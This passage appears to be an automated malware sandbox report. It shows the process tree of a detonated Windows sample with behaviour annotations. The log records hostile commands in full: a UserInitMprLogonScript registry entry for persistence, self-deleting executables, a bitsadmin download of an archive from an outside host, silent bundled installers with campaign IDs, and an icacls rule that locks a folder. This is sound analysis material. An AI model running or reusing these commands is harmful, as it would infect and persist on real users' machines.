                                                                                                                                                                            • C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                              expand C:\Users\Admin\AppData\Local\Temp\is-PN8VP.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                                                                                              12⤵
                                                                                                                                                                                PID:6472
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                                                                              11⤵
                                                                                                                                                                                PID:8716
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                                                                                  12⤵
                                                                                                                                                                                    PID:7544
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-PN8VP.tmp\{app}\vdi_compiler.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-PN8VP.tmp\{app}\vdi_compiler"
                                                                                                                                                                                  11⤵
                                                                                                                                                                                    PID:4444
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-PN8VP.tmp\{app}\vdi_compiler.exe"
                                                                                                                                                                                      12⤵
                                                                                                                                                                                        PID:5104
                                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                          ping 127.0.0.1 -n 4
                                                                                                                                                                                          13⤵
                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                          PID:4148
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "cmd.exe" /c start http://coeplorfd234.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                                                                                                      11⤵
                                                                                                                                                                                        PID:8756
                                                                                                                                                                                      • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                                                                                                        "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                                                                                                        11⤵
                                                                                                                                                                                          PID:9196
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\vpn.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=720
                                                                                                                                                                                      9⤵
                                                                                                                                                                                        PID:8660
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-NTV87.tmp\vpn.tmp
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-NTV87.tmp\vpn.tmp" /SL5="$306A4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=720
                                                                                                                                                                                          10⤵
                                                                                                                                                                                            PID:8456
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                                                              11⤵
                                                                                                                                                                                                PID:7496
                                                                                                                                                                                                • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                  tapinstall.exe remove tap0901
                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                    PID:3684
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                    PID:2224
                                                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                      tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                        PID:1796
                                                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                        PID:8736
                                                                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                          PID:6492
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Settings Installation.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Settings Installation.exe" SID=775 SID CID=775 SILENT=1 /quiet
                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                        PID:2028
                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zn2v1xe5.cdx\autosubplayer.exe /S & exit
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:7112
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\zn2v1xe5.cdx\autosubplayer.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\zn2v1xe5.cdx\autosubplayer.exe /S
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:6648
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj93C3.tmp\tempfile.ps1"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:7620
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj93C3.tmp\tempfile.ps1"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:8460
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj93C3.tmp\tempfile.ps1"
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:6152
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj93C3.tmp\tempfile.ps1"
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:8596
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj93C3.tmp\tempfile.ps1"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:6724
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj93C3.tmp\tempfile.ps1"
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:8564
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj93C3.tmp\tempfile.ps1"
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                    PID:9200
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                    "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                    • Download via BitsAdmin
                                                                                                                                                                                                                    PID:9160
                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tjcjk1w5.bce\installer.exe /qn CAMPAIGN=654 & exit
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:6688
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\tjcjk1w5.bce\installer.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\tjcjk1w5.bce\installer.exe /qn CAMPAIGN=654
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:5980
                                                                                                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:2460
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\A53B.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\A53B.exe
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:4312
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\A53B.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\A53B.exe
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                    PID:3952
                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:5076
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\379.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\379.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                    PID:4916
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\19D1.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\19D1.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                    PID:6004
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\252C.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\252C.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:3680
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                      PID:4736
                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:5744
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\73F9.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\73F9.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:6496
                                                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:1916
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8C54.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\8C54.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:6336
                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:3680
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\8C54.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\8C54.exe
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:5880
                                                                                                                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                • Drops file in Drivers directory
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                PID:5796
                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:752
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\BCBC.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\BCBC.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:4860
                                                                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:6564
                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 67DB4E2FF2F9B0DC520363B899A7DC2A C
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:5204
                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 31901A814870663F6B6BC076BDF07041 C
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:2192
                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 82A2BD7E8AB2A48BB1AE70481644416C
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:6400
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:8064
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe" -silent=1 -CID=778 -SID=778 -submn=default
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:7584
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" "--loGQqfG2tg"
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:5184
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Settings\Settings.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Settings\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Settings\User Data" --annotation=plat=Win64 --annotation=prod=Settings --annotation=ver=0.0.13 --initial-client-data=0x2dc,0x2e0,0x2e4,0x2b8,0x2e8,0x7ffd79e3dec0,0x7ffd79e3ded0,0x7ffd79e3dee0
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:4168
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --mojo-platform-channel-handle=1872 /prefetch:8
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:7784
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1824 /prefetch:2
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:2988
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2708 /prefetch:1
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:9060
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2676 /prefetch:1
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:4336
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --mojo-platform-channel-handle=2368 /prefetch:8
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:8368
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3192 /prefetch:2
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:7132
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --mojo-platform-channel-handle=3304 /prefetch:8
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                          PID:6852
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --mojo-platform-channel-handle=3292 /prefetch:8
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                            PID:6396
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --mojo-platform-channel-handle=3748 /prefetch:8
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:9056
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --mojo-platform-channel-handle=3744 /prefetch:8
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:996
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --mojo-platform-channel-handle=2692 /prefetch:8
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:356
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                              "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_745A.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:8484
                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            PID:888
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:7608
                                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                              PID:4844
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:7336
                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:6844
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\84EA.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\84EA.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:8556
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\84EA.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\84EA.exe
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:8620
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                          icacls "C:\Users\Admin\AppData\Local\dda661b8-105a-4781-acfe-eaacc6a7695f" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                          PID:4528
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\84EA.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\84EA.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:8348
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\84EA.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\84EA.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                PID:8656
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\4906ef58-bc07-4631-b63d-12f1d188d94f\build2.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\4906ef58-bc07-4631-b63d-12f1d188d94f\build2.exe"
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:8820
